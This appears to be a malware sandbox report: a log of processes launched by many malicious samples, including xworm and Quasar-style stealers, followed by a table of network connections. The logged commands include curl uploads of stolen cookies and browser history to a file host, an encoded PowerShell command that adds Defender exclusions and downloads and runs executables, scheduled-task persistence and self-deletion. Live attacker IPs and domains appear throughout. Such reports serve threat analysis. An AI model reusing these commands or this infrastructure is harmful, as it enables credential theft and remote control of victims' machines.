C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\Desktop\New Text Document mod.exse\a\t5abhIx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\t5abhIx.exe"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\patcher.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\patcher.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pHash.bat

C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe"

C:\Windows\system32\curl.exe

curl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"

C:\Users\Admin\Desktop\4363463463464363463463463\Files\xworm.exe

"C:\Users\Admin\Desktop\4363463463464363463463463\Files\xworm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7784 -ip 7784

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\888.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\888.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe"

C:\Windows\system32\calc.exe

calc.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\Desktop\New Text Document mod.exse\a\mfcthased.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\mfcthased.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe"

C:\Windows\SysWOW64\msiexec.exe

msiexec /i vcredist.msi

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"

C:\Users\Admin\AppData\Local\Temp\is-RH7SP.tmp\jy.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RH7SP.tmp\jy.tmp" /SL5="$405D2,1888137,52736,C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5844 -ip 5844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5844 -s 1112

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe

"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\Wave.exe

C:\Users\Admin\AppData\Roaming\Wave.exe

C:\Users\Admin\Windows.exe

C:\Users\Admin\Windows.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISAB9511B1EE52494CA9BAED6A1536F012_1_0_6_1940.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C5A61B1432C54B074EF4E967800944C6 C

C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 8428 -ip 8428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8428 -s 1300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 twizthash.net udp
RU 185.215.113.66:80 twizthash.net tcp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
CN 39.106.216.88:80 tcp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
TH 45.141.26.234:80 45.141.26.234 tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 234.26.141.45.in-addr.arpa udp
AE 62.60.226.24:80 62.60.226.24 tcp
US 8.8.8.8:53 24.226.60.62.in-addr.arpa udp
TH 185.84.161.186:80 185.84.161.186 tcp
US 8.8.8.8:53 186.161.84.185.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 cxcs.microsoft.net udp
GB 88.221.135.27:443 www.bing.com tcp
GB 23.218.72.229:443 cxcs.microsoft.net tcp
US 8.8.8.8:53 i.ibb.co udp
FR 91.134.9.160:443 i.ibb.co tcp
US 8.8.8.8:53 229.72.218.23.in-addr.arpa udp
US 8.8.8.8:53 27.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 160.9.134.91.in-addr.arpa udp
RU 185.215.113.66:80 twizt.net tcp
RU 185.215.113.66:80 twizt.net tcp
FR 91.134.9.160:443 i.ibb.co tcp
TH 185.84.161.186:80 185.84.161.186 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
TH 45.141.26.234:7000 tcp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
CN 101.133.229.117:18080 tcp
US 8.8.8.8:53 ipapi.co udp
FR 91.134.9.160:443 i.ibb.co tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 104.26.9.44:443 ipapi.co tcp
CN 47.92.31.237:8088 tcp
US 8.8.8.8:53 44.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
FR 91.134.9.160:443 i.ibb.co tcp
US 8.8.8.8:53 udp
CO 181.131.217.244:30203 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
CO 181.131.217.244:30203 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 soft.110route.com udp
CN 39.106.158.243:80 soft.110route.com tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.72.235.82:80 www.update.microsoft.com tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 82.235.72.20.in-addr.arpa udp
US 8.8.8.8:53 www.cloudflare.com udp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
RU 91.122.218.118:40500 udp
UZ 195.158.22.4:40500 tcp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
US 104.16.123.96:443 www.cloudflare.com tcp
US 104.26.9.44:443 ipapi.co tcp
US 8.8.8.8:53 96.123.16.104.in-addr.arpa udp
US 8.8.8.8:53 118.218.122.91.in-addr.arpa udp
US 8.8.8.8:53 4.22.158.195.in-addr.arpa udp
HK 47.238.103.180:54322 47.238.103.180 tcp
US 8.8.8.8:53 180.103.238.47.in-addr.arpa udp
YE 78.137.64.239:40500 udp
US 8.8.8.8:53 239.64.137.78.in-addr.arpa udp
CO 181.131.217.244:30203 tcp
US 8.8.8.8:53 vaniloin.fun udp
US 162.159.136.232:443 discord.com tcp
IR 2.176.90.19:40500 udp
US 8.8.8.8:53 19.90.176.2.in-addr.arpa udp
TJ 95.142.87.201:40500 udp
US 8.8.8.8:53 vaniloin.fun udp
US 8.8.8.8:53 201.87.142.95.in-addr.arpa udp
RU 185.81.68.147:443 185.81.68.147 tcp
IR 5.219.134.102:40500 tcp
CN 81.70.105.188:8989 tcp
US 8.8.8.8:53 147.68.81.185.in-addr.arpa udp
CN 101.37.34.164:9000 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:1912 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
UZ 90.156.163.119:40500 udp
RU 185.81.68.147:1912 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 8.8.8.8:53 119.163.156.90.in-addr.arpa udp
CO 181.131.217.244:30203 tcp
US 8.8.8.8:53 vaniloin.fun udp
KZ 88.204.209.230:40500 udp
US 8.8.8.8:53 230.209.204.88.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 vaniloin.fun udp
RU 37.78.33.95:40500 udp
CO 181.131.217.244:30203 tcp
US 8.8.8.8:53 95.33.78.37.in-addr.arpa udp
KZ 5.251.95.166:40500 udp
US 8.8.8.8:53 166.95.251.5.in-addr.arpa udp
US 8.8.8.8:53 vaniloin.fun udp
TH 85.203.4.238:80 85.203.4.238 tcp
US 8.8.8.8:53 iam.nigga.dad udp
TH 103.230.121.81:30120 iam.nigga.dad tcp
KR 146.56.118.137:80 146.56.118.137 tcp
US 8.8.8.8:53 238.4.203.85.in-addr.arpa udp
US 8.8.8.8:53 81.121.230.103.in-addr.arpa udp
AO 129.122.141.24:40500 udp
US 8.8.8.8:53 137.118.56.146.in-addr.arpa udp
US 8.8.8.8:53 24.141.122.129.in-addr.arpa udp
US 8.8.8.8:53 135.244.100.95.in-addr.arpa udp
KR 152.67.212.187:443 152.67.212.187 tcp
UZ 45.150.26.122:40500 tcp
US 8.8.8.8:53 187.212.67.152.in-addr.arpa udp
US 8.8.8.8:53 59.139.73.23.in-addr.arpa udp
RU 93.123.145.179:40500 udp
CA 158.69.12.143:7771 camp.zapto.org tcp
KR 152.67.212.187:443 152.67.212.187 tcp
US 8.8.8.8:53 vaniloin.fun udp
US 8.8.8.8:53 179.145.123.93.in-addr.arpa udp
RU 176.122.27.90:9999 176.122.27.90 tcp
CN 101.37.34.164:9000 tcp
RU 176.122.27.90:8888 tcp
US 8.8.8.8:53 IreJMAyyAgFr.IreJMAyyAgFr udp
US 8.8.8.8:53 90.27.122.176.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 198.163.193.229:40500 udp
US 8.8.8.8:53 229.193.163.198.in-addr.arpa udp
N/A 127.0.0.1:54636 tcp
N/A 224.0.0.251:5353 udp
FR 194.59.30.220:5000 194.59.30.220 tcp
US 8.8.8.8:53 vaniloin.fun udp
US 8.8.8.8:53 220.30.59.194.in-addr.arpa udp
MX 189.135.23.235:40500 udp
US 8.8.8.8:53 235.23.135.189.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 167.71.56.116:22764 tcp
KZ 95.59.33.46:40500 udp
US 8.8.8.8:53 46.33.59.95.in-addr.arpa udp
US 8.8.8.8:53 sKHBjdJjAeqineTxoPMnYrwBuSv.sKHBjdJjAeqineTxoPMnYrwBuSv udp
US 8.8.8.8:53 vaniloin.fun udp
DE 167.71.56.116:22764 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
KG 212.112.107.11:40500 udp
CN 8.134.12.90:7777 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 11.107.112.212.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
YE 134.35.46.82:40500 udp
RU 91.122.218.118:40500 tcp
US 8.8.8.8:53 82.46.35.134.in-addr.arpa udp
TH 103.230.121.81:30220 iam.nigga.dad tcp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 vaniloin.fun udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 45.112.123.126:443 api.gofile.io tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 126.123.112.45.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
FR 89.156.24.108:1738 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
IR 151.232.245.146:40500 udp
US 8.8.8.8:53 146.245.232.151.in-addr.arpa udp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 download.emailorganizer.com udp
NL 190.2.142.115:80 download.emailorganizer.com tcp
UZ 213.230.126.39:40500 tcp
US 8.8.8.8:53 blank-lqobj.in udp
US 8.8.8.8:53 115.142.2.190.in-addr.arpa udp
US 8.8.8.8:53 store4.gofile.io udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 245.70.14.31.in-addr.arpa udp
TH 103.230.121.81:30220 iam.nigga.dad tcp
YE 94.26.219.44:40500 udp
US 8.8.8.8:53 bgteamtestapp.azurewebsites.net udp
US 8.8.8.8:53 44.219.26.94.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
DE 167.71.56.116:22764 tcp
US 52.173.134.115:80 bgteamtestapp.azurewebsites.net tcp
US 8.8.8.8:53 vaniloin.fun udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 115.134.173.52.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.98:80 r11.o.lencr.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 98.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
